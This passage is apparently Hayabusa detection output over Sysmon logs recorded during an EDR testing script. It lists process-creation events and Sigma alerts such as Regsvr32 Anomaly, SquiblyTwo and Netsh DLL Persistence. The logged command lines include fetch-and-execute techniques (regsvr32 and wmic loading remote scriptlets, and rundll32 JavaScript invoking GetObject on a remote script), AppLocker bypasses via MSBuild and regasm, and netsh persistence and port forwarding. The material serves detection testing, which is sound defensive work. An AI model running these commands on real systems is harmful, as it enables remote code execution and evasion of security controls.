Bypass,,rules/sigma/process_creation_sysmon/proc_creation_win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-29 21:33:39.372 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: timeout 5 | Process: C:\Windows\System32\timeout.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 5256 | PGUID: 747F3D96-6633-5D3F-0000-0010F0638900",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-29 21:33:39.907 +00:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U AllTheThings.dll | Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: cmd /c C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U AllTheThings.dll | LID: 0x413182 | PID: 3512 | PGUID: 
747F3D96-6633-5D3F-0000-0010D9778900,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-29 21:33:39.907 +00:00,MSEDGEWIN10,1,low,Evas,Possible Applocker Bypass,,rules/sigma/process_creation_sysmon/proc_creation_win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-29 21:33:44.268 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: cmd /c regsvr32.exe /s /u /i:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Cmstp_calc.sct scrobj.dll | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 1652 | PGUID: 747F3D96-6638-5D3F-0000-00103DA88900",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-29 21:33:44.287 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: timeout 5 | Process: C:\Windows\System32\timeout.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 4632 | PGUID: 747F3D96-6638-5D3F-0000-001022AA8900",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-29 21:33:44.641 +00:00,MSEDGEWIN10,1,info,,Process Created,Cmd: regsvr32.exe /s /u /i:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Cmstp_calc.sct scrobj.dll | Process: C:\Windows\System32\regsvr32.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: cmd /c regsvr32.exe /s /u /i:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Cmstp_calc.sct scrobj.dll | LID: 0x413182 | PID: 4288 | PGUID: 
747F3D96-6638-5D3F-0000-001067BA8900,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-29 21:33:44.641 +00:00,MSEDGEWIN10,1,high,Evas,Regsvr32 Flags Anomaly,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_regsvr32_flags_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-29 21:33:44.641 +00:00,MSEDGEWIN10,1,high,Evas,Regsvr32 Anomaly,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_regsvr32_anomalies.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-29 21:33:45.581 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\System32\calc.exe"" | Process: C:\Windows\System32\calc.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: regsvr32.exe /s /u /i:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Cmstp_calc.sct scrobj.dll | LID: 0x413182 | PID: 208 | PGUID: 747F3D96-6639-5D3F-0000-001074F48900",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-29 21:33:46.095 +00:00,MSEDGEWIN10,3,medium,,Network Connection_Sysmon Alert,Suspicious NetCon | tcp | Src: 10.0.2.15:49829 (MSEDGEWIN10.home) | Dst: 151.101.0.133:443 () | User: MSEDGEWIN10\IEUser | Process: C:\Windows\System32\regsvr32.exe | PID: 4288 | PGUID: 747F3D96-6638-5D3F-0000-001067BA8900,rules/hayabusa/sysmon/alerts/3_NetworkConnection_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-29 21:33:46.095 +00:00,MSEDGEWIN10,3,high,Exec | Evas,Regsvr32 Network 
Activity,,rules/sigma/network_connection/net_connection_win_regsvr32_network_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-29 21:33:49.340 +00:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Windows\System32\xxxFile.csproj | Process: C:\Windows\System32\cmd.exe | PID: 1208 | PGUID: 747F3D96-6609-5D3F-0000-00109FBF8500,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-29 21:33:49.748 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: cmd /c C:\Windows\Microsoft.Net\Framework\v4.0.30319\MSBuild.exe xxxFile.csproj | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 3240 | PGUID: 747F3D96-663D-5D3F-0000-00106F608A00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-29 21:33:49.748 +00:00,MSEDGEWIN10,1,low,Evas,Possible Applocker Bypass,,rules/sigma/process_creation_sysmon/proc_creation_win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-29 21:33:49.889 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: timeout 5 | Process: C:\Windows\System32\timeout.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 4184 | PGUID: 747F3D96-663D-5D3F-0000-001074658A00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-29 21:33:50.104 +00:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\Microsoft.Net\Framework\v4.0.30319\MSBuild.exe xxxFile.csproj | Process: 
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: cmd /c C:\Windows\Microsoft.Net\Framework\v4.0.30319\MSBuild.exe xxxFile.csproj | LID: 0x413182 | PID: 5340 | PGUID: 747F3D96-663D-5D3F-0000-001062708A00,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-29 21:33:50.104 +00:00,MSEDGEWIN10,1,low,Evas,Possible Applocker Bypass,,rules/sigma/process_creation_sysmon/proc_creation_win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-29 21:33:53.776 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: cmd /c wmic process get brief /format:""https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Wmic_calc.xsl"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 4260 | PGUID: 747F3D96-6641-5D3F-0000-0010A38C8A00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-29 21:33:53.843 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: timeout 5 | Process: C:\Windows\System32\timeout.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 1516 | PGUID: 747F3D96-6641-5D3F-0000-001066918A00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-29 21:33:54.246 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: wmic process get brief /format:""https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Wmic_calc.xsl"" | Process: C:\Windows\System32\wbem\WMIC.exe | User: 
MSEDGEWIN10\IEUser | Parent Cmd: cmd /c wmic process get brief /format:""https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Wmic_calc.xsl"" | LID: 0x413182 | PID: 4896 | PGUID: 747F3D96-6642-5D3F-0000-0010F69D8A00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-29 21:33:54.246 +00:00,MSEDGEWIN10,1,medium,Evas | Exec,SquiblyTwo,,rules/sigma/process_creation_sysmon/proc_creation_win_bypass_squiblytwo.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-29 21:33:54.246 +00:00,MSEDGEWIN10,1,medium,Exec,Suspicious WMI Reconnaissance,,rules/sigma/process_creation_sysmon/proc_creation_win_wmic_reconnaissance.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-29 21:33:54.246 +00:00,MSEDGEWIN10,1,medium,Evas,XSL Script Processing,,rules/sigma/process_creation_sysmon/proc_creation_win_xsl_script_processing.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-29 21:33:54.630 +00:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Users\IEUser\AppData\Local\Microsoft\Windows\INetCache\IE\LQ86GWLO\Wmic_calc[1].xsl | Process: C:\Windows\System32\Wbem\WMIC.exe | PID: 4896 | PGUID: 747F3D96-6642-5D3F-0000-0010F69D8A00,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-29 21:33:54.630 +00:00,MSEDGEWIN10,11,high,,Windows Shell File Write to Suspicious Folder,,rules/sigma/file_event/file_event_win_win_shell_write_susp_directory.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-29 21:33:54.718 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\System32\calc.exe"" | 
Process: C:\Windows\System32\calc.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: wmic process get brief /format:""https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Wmic_calc.xsl"" | LID: 0x413182 | PID: 5728 | PGUID: 747F3D96-6642-5D3F-0000-0010D6C98A00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-29 21:33:56.665 +00:00,MSEDGEWIN10,3,medium,,Network Connection_Sysmon Alert,Suspicious NetCon | tcp | Src: 10.0.2.15:49830 (MSEDGEWIN10.home) | Dst: 151.101.0.133:443 () | User: MSEDGEWIN10\IEUser | Process: C:\Windows\System32\wbem\WMIC.exe | PID: 4896 | PGUID: 747F3D96-6642-5D3F-0000-0010F69D8A00,rules/hayabusa/sysmon/alerts/3_NetworkConnection_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-29 21:33:58.256 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: cmd /c netsh trace start capture=yes filemode=append persistent=yes tracefile=trace.etl | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 5084 | PGUID: 747F3D96-6646-5D3F-0000-0010E32E8B00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-29 21:33:58.256 +00:00,MSEDGEWIN10,1,medium,Disc | CredAccess,Capture a Network Trace with netsh.exe,,rules/sigma/process_creation_sysmon/proc_creation_win_netsh_packet_capture.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-29 21:33:58.286 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: cmd /c netsh trace show status | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C 
""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 4148 | PGUID: 747F3D96-6646-5D3F-0000-0010A7318B00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-29 21:33:58.485 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: cmd /c netsh.exe add helper AllTheThings.dll | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 3824 | PGUID: 747F3D96-6646-5D3F-0000-001051388B00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-29 21:33:58.543 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: cmd /c netsh interface portproxy add v4tov4 listenport=8080 listenaddress=0.0.0.0 connectport=8000 connectaddress=192.168.1.1 | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 6760 | PGUID: 747F3D96-6646-5D3F-0000-001029398B00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-29 21:33:58.598 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: cmd /c netsh interface portproxy delete v4tov4 listenport=8080 listenaddress=0.0.0.0 | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 3868 | PGUID: 747F3D96-6646-5D3F-0000-0010A7398B00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-29 21:33:58.683 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: cmd /c netsh trace stop | Process: 
C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 6232 | PGUID: 747F3D96-6646-5D3F-0000-0010913A8B00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-29 21:34:00.330 +00:00,MSEDGEWIN10,1,info,,Process Created,Cmd: netsh trace show status | Process: C:\Windows\System32\netsh.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: cmd /c netsh trace show status | LID: 0x413182 | PID: 5760 | PGUID: 747F3D96-6647-5D3F-0000-0010F4648B00,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-29 21:34:00.420 +00:00,MSEDGEWIN10,1,info,,Process Created,Cmd: netsh trace start capture=yes filemode=append persistent=yes tracefile=trace.etl | Process: C:\Windows\System32\netsh.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: cmd /c netsh trace start capture=yes filemode=append persistent=yes tracefile=trace.etl | LID: 0x413182 | PID: 5056 | PGUID: 747F3D96-6647-5D3F-0000-0010AE6E8B00,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-29 21:34:00.420 +00:00,MSEDGEWIN10,1,medium,Disc | CredAccess,Capture a Network Trace with netsh.exe,,rules/sigma/process_creation_sysmon/proc_creation_win_netsh_packet_capture.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-29 21:34:00.434 +00:00,MSEDGEWIN10,1,info,,Process Created,Cmd: netsh trace stop | Process: C:\Windows\System32\netsh.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: cmd /c netsh trace stop | LID: 0x413182 | PID: 4568 | PGUID: 
747F3D96-6647-5D3F-0000-001005738B00,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-29 21:34:00.442 +00:00,MSEDGEWIN10,1,info,,Process Created,Cmd: netsh interface portproxy delete v4tov4 listenport=8080 listenaddress=0.0.0.0 | Process: C:\Windows\System32\netsh.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: cmd /c netsh interface portproxy delete v4tov4 listenport=8080 listenaddress=0.0.0.0 | LID: 0x413182 | PID: 5048 | PGUID: 747F3D96-6647-5D3F-0000-001065758B00,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-29 21:34:00.442 +00:00,MSEDGEWIN10,1,medium,LatMov | Evas | C2,Netsh Port Forwarding,,rules/sigma/process_creation_sysmon/proc_creation_win_netsh_port_fwd.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-29 21:34:00.460 +00:00,MSEDGEWIN10,1,info,,Process Created,Cmd: netsh interface portproxy add v4tov4 listenport=8080 listenaddress=0.0.0.0 connectport=8000 connectaddress=192.168.1.1 | Process: C:\Windows\System32\netsh.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: cmd /c netsh interface portproxy add v4tov4 listenport=8080 listenaddress=0.0.0.0 connectport=8000 connectaddress=192.168.1.1 | LID: 0x413182 | PID: 4028 | PGUID: 747F3D96-6647-5D3F-0000-001057768B00,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-29 21:34:00.460 +00:00,MSEDGEWIN10,1,medium,LatMov | Evas | C2,Netsh Port Forwarding,,rules/sigma/process_creation_sysmon/proc_creation_win_netsh_port_fwd.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-29 21:34:00.466 +00:00,MSEDGEWIN10,1,info,,Process Created,Cmd: 
netsh.exe add helper AllTheThings.dll | Process: C:\Windows\System32\netsh.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: cmd /c netsh.exe add helper AllTheThings.dll | LID: 0x413182 | PID: 5236 | PGUID: 747F3D96-6647-5D3F-0000-0010927C8B00,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-29 21:34:00.466 +00:00,MSEDGEWIN10,1,high,PrivEsc,Suspicious Netsh DLL Persistence,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_netsh_dll_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-29 21:34:00.731 +00:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\System32\svchost.exe -k netsvcs -p -s NetSetupSvc | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 5376 | PGUID: 747F3D96-6647-5D3F-0000-001052998B00,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-29 21:34:00.970 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: timeout 5 | Process: C:\Windows\System32\timeout.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 5256 | PGUID: 747F3D96-6648-5D3F-0000-0010B9AB8B00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-29 21:34:01.090 +00:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\dispdiag.exe -out dispdiag_start.dat | Process: C:\Windows\System32\dispdiag.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: netsh trace start capture=yes filemode=append persistent=yes tracefile=trace.etl | LID: 0x413182 | PID: 3704 | PGUID: 
747F3D96-6648-5D3F-0000-001092BB8B00,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-29 21:34:05.237 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: cmd /c rundll32 AllTheThings.dll,EntryPoint | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 6836 | PGUID: 747F3D96-664D-5D3F-0000-0010F1498C00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-29 21:34:05.252 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: timeout 5 | Process: C:\Windows\System32\timeout.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 6056 | PGUID: 747F3D96-664D-5D3F-0000-0010114D8C00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-29 21:34:05.502 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: rundll32 AllTheThings.dll,EntryPoint | Process: C:\Windows\System32\rundll32.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: cmd /c rundll32 AllTheThings.dll,EntryPoint | LID: 0x413182 | PID: 912 | PGUID: 747F3D96-664D-5D3F-0000-00108D5B8C00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-29 21:34:05.542 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: rundll32 AllTheThings.dll,EntryPoint | Process: C:\Windows\SysWOW64\rundll32.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: rundll32 AllTheThings.dll,EntryPoint | LID: 0x413182 | PID: 5572 | PGUID: 
747F3D96-664D-5D3F-0000-0010BB5D8C00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-29 21:34:10.373 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: cmd /c rundll32.exe javascript:""\..\mshtml,RunHTMLApplication "";document.write();GetObject(""script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/test"") | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 5844 | PGUID: 747F3D96-6652-5D3F-0000-0010B9708C00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-29 21:34:10.373 +00:00,MSEDGEWIN10,1,high,Evas,Rundll32 JS RunHTMLApplication Pattern,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_rundll32_js_runhtmlapplication.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-29 21:34:10.373 +00:00,MSEDGEWIN10,1,medium,Evas,Suspicious Rundll32 Script in CommandLine,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_rundll32_script_run.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-29 21:34:10.388 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: timeout 5 | Process: C:\Windows\System32\timeout.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 5268 | PGUID: 747F3D96-6652-5D3F-0000-001059728C00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-29 21:34:10.708 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: rundll32.exe 
